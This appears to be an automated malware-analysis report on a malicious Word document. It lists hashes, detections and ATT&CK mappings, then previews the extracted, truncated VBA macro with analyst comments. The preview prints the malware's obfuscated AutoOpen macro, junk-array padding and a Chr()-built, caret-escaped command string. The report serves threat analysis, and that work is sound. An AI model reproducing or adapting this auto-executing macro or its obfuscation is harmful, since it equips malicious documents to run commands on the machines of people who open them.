Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b6bfc64074f98ac0…

MALICIOUS

Office (OLE)

163.2 KB Created: 2018-09-25 07:47:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: b81da8e0345540bb21dbf999da9f749f SHA-1: a8013650dbc2a31c6f75fa996170304e38aa7767 SHA-256: b6bfc64074f98ac044e40f1d75c071a3fba26c16ca86aea6b920a04af79b0aba
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a legacy WordBasic AutoOpen macro. The presence of a Shell() call within the VBA code indicates that it is designed to execute arbitrary commands. This functionality is commonly used to download and execute a second-stage payload, which is why this attack pattern is assessed with high confidence. The ClamAV detection name provides a specific identifier for this threat.

Heuristics 6

  • ClamAV: Doc.Malware.Valyria-6922959-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6922959-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is evidence, intended for analysts, of the legacy Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 164682 bytes
SHA-256: 1f9c1b3ddf052e8fabcffa51326a4ca0be7504f57c06289aaf66b71d429ed9dc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XGMBXajD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: Word runs a procedure named AutoOpen when the
' document is opened, which is the marker behind the OLE_VBA_AUTOOPEN finding
' in the report above.
' Analyst notes: none of the identifiers summed inside the Mid/MidB/Left/Right
' calls below is declared in this Sub or anywhere in the visible listing, and
' none of the arrays populated here (qXiuf, kFCAV, TDRwc, BUqbwA, SnzPXo,
' CTNBI, zHqqGW, GKjSZ, vqfKDq) is read again inside this Sub. They look like
' padding meant to bury the single real call on the wTprkCCzCuL line -- TODO
' confirm against the truncated remainder of the extracted script.
Sub AutoOpen()
   Dim qXiuf(1)
qXiuf(0) = MidB(iDaRHGhO + RddvhrilUHIaXOjslFz + MUwHpG, 791, 524) + MidB(AmHTJfz + zkadDTmsWiZRfJjNiiijWrX + uZNliF, 976, 683) + MidB(uoCNrEDJ + zjwlYQUDDljHZJwqMja + zmjQnb, 379, 655) + MidB(QLdbN + ifhFOhdQvGTVaWmmHzjck + CImvhjuX, 42, 893)
   Dim kFCAV(2)
kFCAV(0) = Mid(OTdtYD + opzDzCXUdXNXYwWJCjEwL + oYZPNs, 860, 161) + MidB(EqSOMah + SpqUFRCtujrlHaNFPfVP + TlEvqG, 441, 527)
kFCAV(1) = Left(hwDTwLw + XqSirBVcHSwElfwww + PXdtO, 929) + MidB(EjOAu + CMtdkTvhGaziSJaKauEwm + VDlhZdd, 699, 548)
   Dim TDRwc(2)
TDRwc(0) = Left(ozDoqhF + AGzOHMAQKzhwVbvqXsiSI + TjhMEczt, 560) + MidB(XwGCtfR + rbFzPODqWnpCUrEGWhDs + EwjUz, 967, 25) + Right(Frajw + wCGqoVMhCbLaXmlLnfir + ivFCuHH, 769) + MidB(AldXjMX + WqkjQIozfiNLiEJKnuUXRl + JObbHutB, 925, 897)
TDRwc(1) = Left(tGJVIaXp + NJfMADTSzdLKEaTRhI + tRjlzO, 825) + Right(ukBSwvuq + cOKhbaLzEXVQlvTSCEbj + uhsIfY, 530) + MidB(nzijFKo + JbZTDWKAYwYAijQTwUfvmlK + LOHOv, 700, 508) + Right(adVzfzDm + VBSYRVMdfmhtaMRhcPDcZ + zwphsA, 599)
   Dim BUqbwA(2)
BUqbwA(0) = Mid(XWGTBV + UEivjjwIZROzBEcpu + zNVvM, 969, 90) + Left(jIRkdQ + kosSWaVIYEPYzJGUZk + tIBhGji, 391) + Left(SEGNsb + ZEazkzDnaWwLZjKVCTpdET + bNlRf, 801) + Right(AHtXB + NDzoHsAOhGcbWfosbah + GjOfwFmT, 467)
BUqbwA(1) = Left(ZGfoODM + ZMCaZlNJCsjuGisCIvmEZ + PAAiY, 256) + MidB(RtdoGM + JVJvizNkKKPomSXVNifi + Vpozom, 794, 318) + MidB(iQMWQDn + CukilBiriUirIKIPvY + wJZMFAFJ, 909, 726) + MidB(clKDwSD + XwqlnNFXzphwnVLhlUZsb + XAFTdVXM, 486, 226)
   Dim SnzPXo(1)
SnzPXo(0) = MidB(jzprHCVM + FPiqqFoDUJjOJculFBEBHQ + OMbzK, 925, 525) + Mid(scwubU + lzijPEaaLwAObvarsUz + CIVUzrdh, 697, 900) + Right(rizSWZ + iGFRDhzcblmKGYjcjiO + EGYQaZ, 420) + Left(CIwCER + cEIJkJvBtnwACPpmIiaDFqWH + EURLqFK, 147)
' The only call in this Sub that is not a VBA string builtin. Its single
' argument concatenates KeyString(...) results (KeyString is not defined in the
' visible listing), literal integer sums, and jttCqFHKK -- the Function defined
' in the HZFNWJNG module further down, which itself assembles strings from
' Chr() of integer sums and caret-separated fragments. wTprkCCzCuL is not
' defined in the visible listing; presumably this is the path to the Shell()
' call the report flags -- verify in the full extracted script.
wTprkCCzCuL (KeyString(spptj + YFtkvrql + 5 + 7 + 9 + 11 + 35 + dWRYt + YNhvm) + VzEvX + tCHETMiB + KeyString(wGvBAIcz + UVjAlSq + 6 + 8 + 11 + 12 + 40 + muOKPkUK + FXWFiz) + jttCqFHKK + cqVvt + hzQwJkaqZz + jvkfKTAUKif + VHNabQj + mRcFpGluIk + nfvkzor + ZQCawjAzC + FFmWCIbEd + fjrHdIJIdS + olvLEjVHD + cOifiwPz + PsUIK)
' Further unused-array assignments after the real call; same padding pattern
' as above (no element is read later in this Sub).
   Dim CTNBI(1)
CTNBI(0) = Mid(ZVkJwFic + jTrXXGIuZocwDIEqGv + uGMNFDmY, 746, 16) + MidB(qJdfbHt + AwYhdswdkFMZzRKEIBBb + qufZOzB, 114, 975) + MidB(ojcKp + QOPQLVwFoFVvFmwREX + GbDHW, 931, 473) + Right(FBLNLa + EPtNAEosbpMXrcJpIEw + unozJit, 247)
   Dim zHqqGW(1)
zHqqGW(0) = MidB(iVjiuO + CCkaOFNSMQwfcwZrUoU + zmUhwL, 864, 500) + MidB(frbpkuu + tGKnUnlVXDqSackjOHT + AiqAHo, 946, 510) + MidB(JMpwAtsa + VnzrJIJNQQamqwFihZ + kqGldkn, 422, 637) + Right(DNjwrtfn + jjvELKwmqdsHNBDdaujidj + zOlBl, 313)
   Dim GKjSZ(2)
GKjSZ(0) = Right(lFJLFTz + AOmzzFXlAwYKbVIutzMz + zYTVT, 822) + Left(VAXdlHB + jZrLaSkkKCuPCozjzCS + zooTzjBs, 25)
GKjSZ(1) = MidB(ZszXHAl + zjCLHbwUsFOPlbwmAJ + iIpJpbYw, 337, 666) + Left(QlcMW + YIiRKwllBwiXnoYSHjvuo + twzwmQN, 308)
   Dim vqfKDq(1)
vqfKDq(0) = Right(SzGMbNZu + NcOumXFlhPiVGCDmHEpD + ffjWmZ, 854) + MidB(CJVAEHE + LhjizXjNHwZRYGrZ + IWWmEshc, 141, 597) + Mid(krPmBjVw + lPHfkcwPfzKMsvR + Gctnn, 644, 30) + Mid(LDSvw + iYIdAPXoioJlDIwF + UrCDpu, 85, 527)
End Sub


Attribute VB_Name = "HZFNWJNG"
Function jttCqFHKK()
jrHVoH = "d" + " " + CStr(Chr(1 + 3 + 4 + 0 + 39)) + "V^" + ":^" + "O" + CStr(Chr(1 + 3 + 4 + 0 + 39)) + "C" + CStr(Chr(0 + 2 + 3 + 0 + 29)) + "s"
cKLMGDWjb = "^e" + "^" + "t " + ";" + "^[" + "=" + "^5" + "^" + "90" + " ^" + "1^" + "9" + "0^" + " 9" + "5^"
fjYQw = "0" + "^ " + "0^" + "3^" + "9 " + "^9" + "^" + "0"
OqvIaEnszCY = "^" + "1" + "^ " + "^5" + "3" + "^0" + "^" + " " + "1" + "0" + "9 " + "9" + "^" + "3"
RirdzDndzwC = "^0" + "^" + " ^" + "35" + "^" + "0 " + "5" + "19" + "^ "
Dim GOnob(2)
GOnob(0) = MidB(ZSAfw + LCDRtKJvaWdACDwkzSz + NfusVh, 80, 861) + Mid(XsUjdf + UuLGODIzjNYkiDNsR + WiuciX, 856, 444)
GOnob(1) = MidB(nlcBJ + rjQkUfnIlmcusHYhLm + M
... (truncated)